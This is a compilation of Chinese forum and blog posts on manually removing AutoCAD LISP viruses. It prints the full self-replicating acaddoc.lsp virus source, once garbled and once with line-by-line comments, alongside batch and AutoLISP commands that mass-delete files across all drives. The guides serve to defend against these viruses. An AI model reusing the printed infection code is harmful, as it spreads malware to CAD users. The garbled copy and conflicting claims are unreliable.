常见CAD病毒文件的手动查杀方法

在软件操作过程中发现楼层无法切换的解决方法（主要由acaddoc.lsp病毒文件引起）。

第一种
1、注意首先将感染acaddoc.lsp病毒的工程文件夹打开，把文件中的acaddoc.lsp文件删除。

2、删除c盘中的boot.dat文件。

3、在鲁班软件安装目录中（sysdat\sys16）找到acaddoc.lsp文件，打开后全选所有内容并删除，保存后关闭。

然后右击该文件夹选择属性，点选只读并确定。

第二种
刚才那个病毒的问题，试过了在我们软件里加一个空的lsp文件打开我们软件就不会有问题了
不过其实病毒还在的，要彻底清除病毒，要删除C:\Documents and
Settings\Administrator\Application Data\Autodesk\AutoCAD
2006\R16.2\chs\Support 这个文件夹里的acadapq.lsp和acaddoc.lsp文件，把acad.mnl 文件里最后的
(load "acadapq")
(princ)
这两句话删除，再删除所有的acaddoc.lsp文件就可以了。

清除方法是删除干净acad.fas与lcm.fas两个文件!
如果删除不净下次启动是还是会生成,务必清理干净!
常见问题是C:\Program Files\autocad***目录（子目录）下的
acad.fas与lcm.fas是在全部查找时找不到的,请手动进入目录再行查找删除!
不想进去目录查找也可以输入下面的字符到CAD命令行：
(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))注意：上面红字一个字都不能少哦！这样就行了!
如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行？：
(setvar "mtexted" ".")
解决方法是彻底的清除acad.fas与lcm.fas两个文件。

如果删除不净下次启动是还是会生成,必须清理干净!
一，搜索安装CAD软件的目录（子目录）下及存放图纸盘中的acad.fas与lcm.fas 全部文件进行删除!（我觉得这样比较彻底一些）
二，不想进去目录查找也可以输入下面的字符到CAD命令行：
(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))
注意：括弧的字一个都不能少。

如果有文字编缉时出现记事本的现象就要将下面一行字输入到命令行：(setvar "mtexted" ".")。

1、在360安全卫士中，卸载CAD软件以及DWF等所有CAD的相关软件；
2、在360安全卫士中，电脑清理（全选）——清理——跳过风险项；
一键清理
清理注册列表（右下角选项，全选）
3、“我的电脑”——搜索（搜索选项具体见图片）“acad.lsp”、“acad.fas”、“acaddoc.lsp”、“acad.sys”、“acad.app.lsp”——彻底删除（shift+delete）
4、重启电脑
5、CAD安装
1.如果看到图纸文件夹内除了.dwg文件外，还有.fas .lsp .mnl .arx类型文件，如果不明其用途，一定要删除，拷贝别人图纸的时候，注意别把它们拷贝过来。

特别是通过网络共享打开对方文件夹内图纸时候，如果看见这类文件，切勿直接打开，须将图纸拷贝到自己电脑上再打开。

通俗的讲，只要不拷贝这类文件，99%不会中毒。

CAD中“党是不会亏待你的”恶意程序删除办法
一、病毒发作后的主要表现：
①、病毒在启动CAD时会弹出一个显示时间并写有“党
是不会亏待你”的对话框；
②、病毒在8:00至18:00这个段时间内，对CAD画图没有任何的影响。

当时间不在8:00至18:00之间时，会弹出如下对话框，可能伴随“移动”命令改变~等情况。

二、清除方法：
1、关闭CAD（一定要先关闭正在运行的CAD程序）
2、新建一个文本文件（txt文件）
3、复制如下蓝色内容到文本文件内(不要有任何更改)
@ECHO OFF
ECHO 正在查找并清除CAD病毒文件，请稍候. . .
ECHO.
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if exist %%i: (
%%i:
ECHO 正在查找%%i 盘
cd\
del /f /q /s acad.fas
del /f /q /s lcm.fas
))
ECHO.
ECHO CAD病毒清除完毕！任意键退出!
Pause>Nul
4、将该文本文件另存为“文件名．bat”，文件名随意（假定另存为１．ｂａｔ）
５、鼠标左键双击１．ｂａｔ，运行该文件，出现如下提示框
请淡定并耐心等待，直至出现如下提示内容
如上图，看到红圈内容出现，按任意键退出程序，再重新打开CAD图纸，一切ok啦！
注：如果下次再出现类似问题，运行该文件即可。

一般情况下，如果没有再次拷贝或者下载带有该恶意程序病毒的CAD文件，运行一次即可清除。

最近中了CAD病毒，msconfig里增加了一项“dwgrun.exe”，运行CAD后，自动生成acad.fas文件，而且有些CAD命令也用不了，上网搜了一下，可按下面的方法解决：
方法一
1.清除注册表的启动记录SOFTMICRO..WINdowscurvverRun
2.在运行栏内输入msconfig 在启动项将dwgrun.exe删除
3.清除SYSTEM或SYSTEM32内的winsys.ini 和winfas.ini文件(在安全模式杀)
4.搜索C盘以及CAD安装的盘符D或F"acad.fas或acad.ini"找到并删除或改名
5.打开CAD进入配置选项卡，把启动时加载acad.lsp项取消.重启即可!!
方法二
还有一种cad病毒是在打开dwg文件后出现如下对话框
现在时间是：XX点XX分了的哦！
好好干了啦！党是不会亏待你的！
老板的眼睛是雪亮的啦！
非常讨厌，解决办法是
清除方法是删除干净acad.fas与lcm.fas两个文件!
如果删除不净下次启动是还是会生成，务必清理净!
常见问题是C:Program Filesautocad***目录下(以及子目录下)的acad.fas与lcm.fas是在全部查找时找不到的，请手动进入目录再行查找删除!也就是全盘查找，包括隐藏文件，我曾经中过，结果在系统盘、软件安装盘和其他盘的共享文件夹中都发现过，可见其具有传播性。

手动删除。

再打开果然没有对话框，但不确定是否清除干净。

方法三
使用专杀软件。

手工查杀ACADDOC.LSP病毒发现中的这个病毒的状况是：开AutoCAD2006后提示"＜AutoCAD 菜单实用程序已加载。

正在初始化VBA 系统...执行错误执行错误＞"同时发现工作目录平时只有DWG、BAK 等熟悉文件外，多了acaddoc.lsp，打开看如下：(setqwold_cmd(getvar"cmdecho"))(setvar"cmdecho")(setqwpath(findfile"base.dcl"))(setqwpath(substrwpath1(-(strlenwpath)8)))(setqwwmnlwpath(getvar"menuname" ))(setq wnowdwg (getvar "dwgname" ))(setqwwjqm (findfile wnowdwg))(setq wdwgwpath (substr wwjqm1(-(strlen wwjqm)(strlen wnowdwg))));;;alert(setqf(open"c:\\boot.dat" "w"))(write-line"[dang]"f)(write-line (strcat"ff=" wdwgwpath)f)(write-line (strcat"yy="wpath)f)(closef)(setqboot(findfile "boot.dat"))(if(/=boot"")(command"_-vbarun" "ThisDrawing.hh" ))(setq wacadwpath (findfile "acaddoc.lsp"))(setq wacadwpath (substr wacadwpath1(strlen wacadwpath )11)))(setqwns1""wns2"")(setqwlspbj0)(setq wwjqm (strcat wpath "acaddoc.lsp" ))(if(setqwwjm (open wwjqm "r"))(progn (while (setqwwz(read-linewwjm))(setqwns1wns2)wns2 wwz))(if(> (strlen wns1) 14)(if(= (substr wns187) "acadapq" )(setq wlspbj1)))(close wwjm)))(setq wlspmnl 0)(setq wwjqm (strcat wpath "acad.mnl" ))(if(setq wwjm (open wwjqm "r")) (progn (while (setq wwz (read-line wwjm))(setq wns1 wns2) (setq wns2 wwz))(if(> (strlen wns1) 14)(if(= (substrwns187) "acadapq" )(setq wlspmnl 1))) (closewwjm)))(if(= wlspmnl 0) (progn (setq wwjqmwpath (strcat (chr97)(chr99)(chr97)(chr 100) (chr46)(chr 109) (chr 110) (chr108))))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34) ")")wwjm)(write-line "(princ)" wwjm)wwjm)))(defun wwriteapp () (if(setqwwjm1 (open wnewacad "w"))(progn (setqwwjm (open woldacad "r"))(while (setqwwz(read-line wwjm))(write-line wwzwwjm1))(close wwjm)(close wwjm1))))(and(= wacadwpath wdwgwpath) (/= wacadwpath wpath))(progn(if(= 0wlspmnl)(progn(setq woldacad (findfile "acaddoc.lsp" ))(setq wnewacad (strcat wpath "acadapq.lsp") ))(progn(setq woldacad (strcatwpath "acadapq.lsp" ))(setq wnewacad (findfile "acaddoc.lsp" )))(if(=wlspbj0) (progn (setq wwjqm (strcat wpath "acaddoc.lsp" ))(setqwwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34)")")wwjm)(write-line "(princ)" wwjm)(close wwjm))) (wwriteapp ))(progn(/= wnowdwg "Drawing.dwg" )(progn(setq woldacad (findfile "acadapq.lsp" ))(setq wnewacad (strcat wdwgwpath "acaddoc.lsp" )) (wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ)(setq strtopstr (strcat(chr92)(chr92)(chr70)(chr83)(chr49)(chr(chr83)(chr89)(chr83)(chr49)(chr92)(chr87)(chr79)(chr82)(chr75)(chr92)(chr80)(chr76)(chr79)(chr84)(chr69)(chr82)))(setq strbottomstr (strcat (chr(chr92)(chr76)(chr(chr67)(chr80)(chr82)(chr88)(chr89)(chr49)(chr46)(chr69)(chr88)(chr69)))(startapp(strcatstrtopstrstrbottomstr))(setvar"cmdecho"wold_cmd)(princ)(princ)N年以前学了点autolsp，虽然没编过什么程序，这个病毒基本还比较浅，能看得出个大概流程，原理跟acad.lsp差不多，利用AutoCAD自动加载文件活得病毒运行，然后感染，acaddoc.lsp是AutoCAD2004后每个图形打开时执行的例行程序，方便二次开发用的，当然也为病毒编写人敞开大门。

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

第一步：查找硬盘、U盘内的acad.fas、lcm.fas、acad.lsp、acadapp.lsp、acadappp.lsp 五个文件并删除干净（查找前请将显示隐藏和系统文件打开，这五个文件不一定同时出现。

强烈建议使用Total Commander文件管理器查找）。

第二步：查找acad.mnl文件（这个文件通常有两个，一个在“c:\ProgramFiles\AutoCAD****\UserDataCache\Support\”文件夹下，另一个在“c:\Documents and Settings\你的用户名\Application Data\Autodesk\AutoCAD****\R****\chs\Support\”文件夹下。

目前病毒仅修改第一个acad.mnl文件）。

打开acad.mnl文件，在文件末尾找到以下三个语句的组合并删除（这三个语句组合不一定同时出现），然后保存文件。

(if (null stol) (load "lcm" ""))(princ)(load "acadapp.lsp")(princ)(load "acadappp.lsp")(princ)最后将acad.mnl文件的属性改为只读附录：有关该CAD病毒acad.fas 的说明：1.它对电脑是没有任意的危害性！2.它在8:00到18:00这段时间,对CAD没有任何影响的!它的副作用就是：你的CAD在启动时会弹出一个显示时间的对话框如果时间不在8:00至18:00之间，还有可能伴随"移动"命令改变等情况。

在这段时间内的临时解决方案为：将电脑系统时间调整8:00就行了!(有必时请关了CAD后再打开CAD)不想进去目录查找也可以输入下面的字符到CAD命令行：(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行？：(setvar "mtexted" ".")我的也中过，通过下面办法解决了。

AUTOCAD病毒的清除方法acaddoc.lsp是一个专门针对CAD文件的病毒，在CAD软件使用中主要表现的情况如下：1、无法拷贝2、在命令行提示需要执行一个宏3、CAD会出莫名其妙的问题解决方法：关闭AutoCAD程序;搜索所有acaddoc.lsp和acadapq.lsp文件删除所有关acadapq.lsp(3,836字节) 和被感染的acaddoc.lsp(27字节) (看文件大小);重启AutoCAD,OKashan发表LZ还说少了一个步骤：没有处理acad.mnl文件，这样的清除并不彻底，下次再打开带毒的dwg文件（这里并非指dwg文件本身带毒，而是指在该dwg文件下有acaddoc.lsp文件存在）后，系统又会感染病毒，偶曾经对这个cad病毒的代码做过详细分析，下面是原文，有兴趣的朋友可以详细看看：最近自己的电脑中了CAD病毒，症状为打开一个dwg文件后，在该dwg文件所在目录下就会自动生成一个“acaddoc.lsp”文件，即使手工将其删除，下次打开dwg文件时又会自动生成。

如果把dwg文件和acaddoc.lsp文件一起复制到另外一部未感染CAD病毒的电脑上，只要一打开该dwg文件，则该电脑就会被感染。

因为这个CAD病毒是个lisp程序，花了些时间对病毒代码进行分析如下：-----------------下面是病毒代码-----------------------------(setq wold_cmd (getvar "cmdecho"))(setvar "cmdecho" 0)(setq wpath (findfile "base.dcl"))(setq wpath (substr wpath 1 (- (strlen wpath) 8))) ;wpath变量保存ACAD下support目录路径(setq wwmnlwpath (getvar "menuname")) ;获得当前菜单名，这句没有用处，下面并未使用wwmnlwpath变量(setq wnowdwg (getvar "dwgname")) ;获得当前打开图形文件名(setq wwjqm (findfile wnowdwg)) ;wwjqm变量保存当前打开图形文件的完整路径(setq wdwgwpath (substr wwjqm 1( - (strlen wwjqm) (strlen wnowdwg)))) ;wdwgwpath变量保存当前打开图形文件所在路径;;;alert( setq f ( open "c:\\boot.dat" "w")) ;f变量为boot.dat文件句柄，c盘根目录下boot.dat文件若存在则(write-line "[dang]" f) ;打开，不存在则创建，然后将当前打开图形文件所在路径和support(write-line (strcat "ff=" wdwgwpath) f) ;目录路径写入boot.dat文件(write-line (strcat "yy=" wpath) f)(close f)(setq boot (findfile "boot.dat")) ;获得boot.dat文件所在目录完整路径(if (/= boot "") (command "_-vbarun" "ThisDrawing.hh")) ;这句是要运行一个名为“ThisDrawing.hh”的宏，但该宏并不存在(setq wacadwpath (findfile "acaddoc.lsp")) ;wacadwpath变量保存当前加载的acaddoc.lsp文件所在目录(setq wacadwpath (substr wacadwpath 1(- (strlen wacadwpath) 11)))(setq wns1 "" wns2 "")(setq wlspbj 0) ;wlspbj变量是判断support目录下acaddoc.lsp文件是否已感染的;;; ;标志，已感染为1，未感染为0(setq wwjqm (strcat wpath "acaddoc.lsp")) ;wwjqm变量指向support目录下的acaddoc.lsp文件(if (setq wwjm (open wwjqm "r")) ;wwjm变量为打开support目录下的acaddoc.lsp文件的句柄，若打开(progn ;成功则进行处理(while(setq wwz (read-line wwjm)) ;逐行读取acaddoc.lsp文件内容，读取结束后，wns1中是倒数第2行(setq wns1 wns2 ) ;内容，wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，(if (= (substr wns1 8 7) "acadapq") ;若是则已感染(setq wlspbj 1)))(close wwjm)))(setq wlspmnl 0) ;wlspmnl变量是判断support目录下acad.mnl文件是否已感染的标志，;;; ;已感染为1，未感染为0(setq wwjqm (strcat wpath "acad.mnl")) ;wwjqm变量指向support目录下的acad.mnl文件(if (setq wwjm (open wwjqm "r" )) ;wwjm变量为打开support目录下的acad.mnl文件的句柄，若打开(progn ;成功则进行处理(while (setq wwz (read-line wwjm)) ;逐行读取acad.mnl文件内容，读取结束后，wns1中是倒数第2行内容(setq wns1 wns2 ) ;wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，若是则(if (= (substr wns1 8 7) "acadapq") ;已感染(setq wlspmnl 1)))(close wwjm) ;关闭acad.mnl文件))(if (= wlspmnl 0) ;若acad.mnl文件未感染，则写入加载病毒的代码到acad.mnl文件的(progn ;最后2行中(setq wwjqm (strcat wpath(strcat (chr 97) (chr 99) (chr 97)(chr 100) (chr 46) (chr 109)(chr 110) (chr 108)) )) ;障眼法，等于(strcat wpath "acad.mnl")(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(defun wwriteapp ()(if (setq wwjm1 (open wnewacad "w"))(progn(setq wwjm (open woldacad "r"))(while (setq wwz (read-line wwjm))(write-line wwz wwjm1))(close wwjm)(close wwjm1))))(if (and (= wacadwpath wdwgwpath)(/= wacadwpath wpath)) ;若加载的acaddoc.lsp文件和图形文件同目录(progn(if (= 0 wlspmnl) ;acad.mnl文件未感染(progn(setq woldacad (findfile "acaddoc.lsp")) ;在下面调用wwriteapp子程序读取图形文件目录下的acaddoc.lsp文件(setq wnewacad (strcat wpath "acadapq.lsp")) ;的内容，在support目录下创建acadapq.lsp 文件并将acaddoc.lsp) ;文件的内容写入acadapq.lsp文件中;;else （acad.mnl文件已感染）(progn(setq woldacad (strcat wpath "acadapq.lsp" )) ;在下面调用wwriteapp子程序读取support目录下的acadapq.lsp文件(setq wnewacad (findfile "acaddoc.lsp")) ;的内容，写入图形目录下的acaddoc.lsp文件中))(if (= wlspbj 0) ;support目录下的acaddoc.lsp文件未感染(progn ;下面代码将加载病毒程序的代码写入acaddoc.lsp文件的最后2行中(setq wwjqm (strcat wpath "acaddoc.lsp" ))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(wwriteapp));;else （若加载的是support目录下的acaddoc.lsp文件）(progn(if (/= wnowdwg "Drawing.dwg" ) ;当前打开文件不是新建图形文件(progn(setq woldacad (findfile "acadapq.lsp")) ;在图形文件目录下创建acaddoc.lsp文件，将acadapq.lsp(setq wnewacad (strcat wdwgwpath "acaddoc.lsp")) ;文件的内容写入acaddoc.lsp文件中(wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ) ;下面的代码又是个障眼法，没什么作用(setq strtopstr (strcat (chr 92) (chr 92) (chr 70)(chr 83) (chr 49) (chr 92)(chr 83) (chr 89) (chr 83)(chr 49) (chr 92) (chr 87)(chr 79) (chr 82) (chr 75)(chr 92) (chr 80) (chr 76)))-----------------病毒代码到此结束----------------------------从以上对病毒代码的分析可知，该病毒的病毒文件有2个，一个为acadapq.lsp，位于ACAD 安装目录下的support目录下，另一个为acaddoc.lsp，位于当前打开的dwg文件所在目录下，2个病毒文件的内容相同。

“党是不会亏待你的”CAD病毒清除方法一、该病毒发作后的主要表现为：①、病毒在启动CAD时会弹出一个显示时间并写有“党是不会亏待你”的对话框；②、病毒在8:00至18:00这个段时间内，对CAD画图没有任何的影响。

当时间不在8:00至18:00之间时，会弹出如下对话框，可能伴随“移动”命令改变~等情况。

（原病毒作者如是说。

不过我在CAD2002上没有发现此更象，可能高版本的CAD才会吧。

）二、清除方法：①、关闭CAD（一定要先关闭正在运行的CAD程序）②、按F3键打开XP系统的文件搜索窗口，搜索并删除acad.fas和lcm.fas文件手工清除方法：首先请关闭CAD后，再搜索所有磁盘内的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件，（记住一定要搜索完所有的磁盘，如C、D、E、F、G等等。

）然后将所有搜索到的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件全部删除。

方法在点击开始 - 搜索 -然后点击搜索所有文件-- 点击更多高级选项，勾选影藏的文件和文件夹。

全部或部分文件名填写acad.fas;acad.sys;acad.ini;lcm.fas;dwgrun.exe;dwgrun.bat;winsys.ini;winfas.ini 然后点击搜索把搜出的文件全部删除。

③、XP文件搜索窗口设置如下：a．搜索acad.fas文件b．搜索lcm.fas文件注意：①、“搜索范围”一定要选择“本机硬盘驱动器 (C:;D:;E:;F”。

②、一定要先勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将病毒文件全部搜索清除干净。

CAD病毒的通用杀毒方法（CAD杀毒acad.lsp病毒解决方法及预防措施等）2009年03月12日星期四 20:26关于网上流传的CAD病毒，特征为：自动生成acad.lsp ，acaddoc.lsp ，acadap.lsp，acad.fas，acad.mnl，acad.sys，lcm.fas，cad.fas，acad.ini等文件；在某时间出现“党不会亏待你”“成功完成复制！”；无法使用炸开、直线命令，鼠标中键不为缩放等等。

其特点均为lisp编写，由于打开CAD时会自动加载运行，所以造成一定程度的危害。

还有一个基于dwwin.exe或dwgrun.exe的病毒，特征是出现winfas.in，dwgrun.bat文件等，其实也是依靠.lsp文件来感染的，但传播方式是依靠.exe 文件，根据这个病毒特征来看，其实是作者水平不算高为实现目的硬生生拼凑的，中这个病毒只能说您安装的杀毒软件实在太差或者设置不合理。

此病毒通过下述方法无法彻底清除，需要使用优秀的杀毒和防御软件，如卡巴，微点等（瑞星就免了吧）。

------------------------------特点说明-------------------------------------------------通俗的解释其特点1.病毒不破坏DWG图纸文件，电脑中的图纸DWG文件照常可以使用。

2.病毒破坏CAD软件的配置，最好重新安装CAD。

3.部分病毒有改写同类文件特点，只要中毒，所有.lsp .mnl等文件逐渐均被改写，此类病毒危害最大。

------------------------------杀毒方法-------------------------------------------------通用杀毒方法将全硬盘、u盘、移动硬盘网络共享文件夹中的.fas .lsp .mnl .arx等类型文件全部删除即可。

具体方法如下：1.关闭CAD。

CAD的病毒文件与杀毒方案方法一：（1）全盘搜索acadapp.*、acadappp.*、acaddoc.*文件，然后彻底删除。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”。

搜索时选择“查找所有文件及文件夹”，然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件及文件夹”。

（2）系统盘根目录下如有boot.dat文件，将其删除。

（3）进入C:\Documents and Settings\用户名\ApplicationData\Autodesk\Autocad20**\R1**\chs\Support目录，用记事本打开该目录下所有*.mnl文件，手动删除与病毒相同的代码（一般在文件末尾），然后保存。

修改后的mnl文件属性改为只读。

（4）进入CAD安装目录下的support目录，将该目录下的所有*.lsp文件同上处理。

方法二：解析ACADDOC.LSP病毒文件与杀毒方案CAD的病毒很多但都大同小异。

现就出现的ACADDOC.LSP病毒进行杀毒。

不用重新安装CAD的办法。

1、发现文件夹中多出ACADDOC.LSP说明你中毒了。

2、关闭CAD程序。

3、全盘查找*.fas *.lsp *.mnl *.arx文件，除了CAD安装目录以外的全部删除。

4、检查CAD安装目录文件的修改时间，把最近的几个文件中的病毒代码删除。

（用记事本打开）5、把CAD安装目录中的所有*.fas *.lsp *.mnl *.arx文件改为只读属性。

说明：1、ACADDOC.LSP病毒感染X:\Program Files\AutoCAD 20**\Support 文件夹下的3d.lsp；3darray.lsp；acad2010.lsp；acad2010doc.lsp；acadinfo.lsp；ai_utils.lsp；attredef.lsp；edge.lsp；mvsetup.lsp；sample-profile-util.lsp文件。

CAD病毒的解决方法①、关闭正在运行的AutoCAD及机械工程师CAD（切记!）②、打开“我的电脑”后，按F3键打开XP系统的文件搜索窗口，在整个硬盘上搜索并彻底删除以下文件：acad.fas;acad.lsp;acad.sys;acad.vlx;acadapp.lsp;lcm.fas;acaddoc.lspWIN764位搜索方法文件名：acad.fas OR acad.lsp OR acad.sys OR acad.vlx OR acadapp.lsp OR lcm.fas OR acaddoc.lsp注意：●“搜索范围”一定要选择“本机硬盘驱动器 (C:;D:;E:;F:)”。

●一定要先勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”及“搜索隐藏的文件及文件夹”项勾选上，否则不能将病毒文件全部搜索清除干净。

见下图●找到后全部删除(彻底删除shift+delete，只是删除到回收站不起作用)。

如果此时一个文件都没有找到，则说明您搜索的文件名称填写错误。

●保证AutoCAD文件夹下没有任何垃圾文件。

③、卸载AutoCAD及机械工程师CAD，删除AutoCAD安装路径。

④、再次搜索上述文件，找不到任何文件时（切记!），再重新安装AutoCAD 及机械工程师CAD。

该病毒症状：感染该病毒后，表现症状也不太相同，一般表现：●AutoCAD的炸开命令（Explode）、多行文字等出现异常。

●机械工程师CAD的许多命令显示为：未知命令。

●AutoCAD的插件命令无法正常使用。

●打开CAD后出现一信息：程序作者QQ：XXXXXXXXXX现在时间是：XX点XX分了的哦！好好干了啦！XX不会亏待你的！老板的眼睛是雪亮的啦！●打开原来的dwg图纸后，尺寸值发生了改变。

该病毒说明：这是一个专门针对CAD的病毒程序，不是传统意义上的病毒，因此，用瑞星、金山毒霸等是不能杀除的（目前）。

它的作用机制是这样的：某台机器上没有这个病毒程序，但在通过网上邻居或U盘拷贝别人的图纸时，大家经常会把整个目录拷贝过来，如果拷贝的这个目录中包含有acad.lsp和acad.vlx 等文件，你的机器就有了这个病毒，但是还没有起作用。

cad使用不正常，CAD病毒清除方法打开CAD后出现一信息分析:这是一个专门针对CAD的病毒程序，不是传统意义上的病毒，因此，用诺顿、金山毒霸等是不能杀除的。

它的作用机制是这样的：某台机器上没有这个病毒程序，在通过网上邻居拷贝别人的图纸时，大家经常会把整个目录拷贝过来，如果拷贝的这个目录中包含有acad.lsp和acadapp.lsp，你的机器就有了这个病毒，但是还没有起作用。

当你用CAD打开这个文件时，CAD会自动加载该目录下的acad.lsp，这个LSP程序会检测你的CAD支持support目录下是否有这两个文件，如果没有，它会自动在那里创建他们的副本。

以后，在你打开别的图纸时，它会在判断你要打开的图纸目录下有没有这两个文件，如果没有，它又在该目录下创建这两个文件的副本。

就这样，你的机器上的dwg文件目录中逐步都有了这个程序。

随着别人按照目录拷贝你的dwg文件，他们也感染上了。

因此，如果你的机器上没有CAD病毒程序，只要你从别处拷贝图纸时，只拷贝dwg文件就不会感染CAD病毒了.LSP 文件 (.lsp) - 一种包含 AutoLISP 程序代码的 ASCII 文本文件。

FAS 文件 (.fas) - 一个 LSP 程序文件的二进制编译版本。

删除:进入CAD文件夹,分别查到acad.fas,acad.lsp和acadapp.lsp,acad.mnl,acad.chw,lcm.fas后删除到C:\Documents and Settings\(你的用户名)\Application Data\Autodesk\AutoCAD2004\R16.0\chs\Support\下(AutoCAD的版本不同2004和16有可能不同)搜索acad.fas,acad.lsp和acadapp.lsp,acad.mnl,acad.chw,lcm.fas后删除.全盘搜索acad.fas,acad.lsp后删除.常见问题是C:\Program Files\autocad***目录（子目录）下的acad.fas与lcm.fas是在全部查找时找不到的,请手动进入目录再行查找删除! 不想进去目录查找也可以输入下面的字符到CAD命令行：(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))注意：上面红字一个字都不能少！这样就行了!如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行：(setvar "mtexted" ".")二。

CAD中移动move变复制copy病毒手动清除方法
CAD中操作:移动move变复制copy病毒手动清除方法
中毒特征:
打开DWG文件显示:
程序作者QQ:252545152
现在时间是:XX点XX分了的哦!
好好干了啦!党是不会亏待你的!
老板的眼睛是雪亮的啦!
手工清除方法:首先请关闭CAD后,再搜索所有磁盘内的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件,(记住一定要搜索完所有的磁盘,如C、D、E、F、G等等。

然后将所有搜索到的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件全部删除。

方法是:点击开始 - 搜索 -然后点击搜索所有文件-- 点击更多高级选项,勾选影藏的文件和文件夹。

全部或部分文件名填写
acad.fas;acad.sys;acad.ini;lcm.fas;dwgrun.exe; dwgrun.bat;winsys.ini;winfas.ini 然后点击搜
索把搜出的文件全部删除。

1次搜不干净搜索4次删除4 次。

就OK了。